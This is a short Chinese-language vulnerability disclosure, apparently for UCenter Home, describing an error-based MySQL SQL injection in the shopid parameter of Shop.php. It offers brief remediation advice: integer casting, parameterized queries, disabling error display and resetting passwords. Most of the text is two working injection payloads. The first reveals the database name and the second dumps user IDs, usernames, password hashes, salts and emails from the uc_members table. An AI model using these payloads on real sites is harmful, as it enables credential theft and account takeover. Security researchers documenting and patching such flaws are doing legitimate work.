作者: inj3ct0r
漏洞文件 : Shop.php
漏洞表现: ?ac=view&shopid=
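漏洞类型 : SQL Injection (MySQL Error Based)。从下面的 POC 看,shopid 参数的值被直接拼接进 SQL 语句,并且数据库报错信息会回显到页面。修复建议:对 shopid 做整型强制转换或改用参数化查询,并关闭数据库错误回显;POC 第 2 步读取的是 uc_members 表中的口令哈希和 salt,受影响站点修复后应重置用户口令。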
利用POC:
1、查询出 UC_HOME 的数据库名(DATABASE):
and (select 1 from(select count(*),concat((select (select concat(0x7e,0×27,unhex(hex(database())),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2、根据1查询出的DATABASE(替换XXOO_UC_DB),进一步注入出member信息:
and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0×27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.salt,0x3a,uc_members.email) as char),0×27,0x7e) from `XXOO_UC_DB`.uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1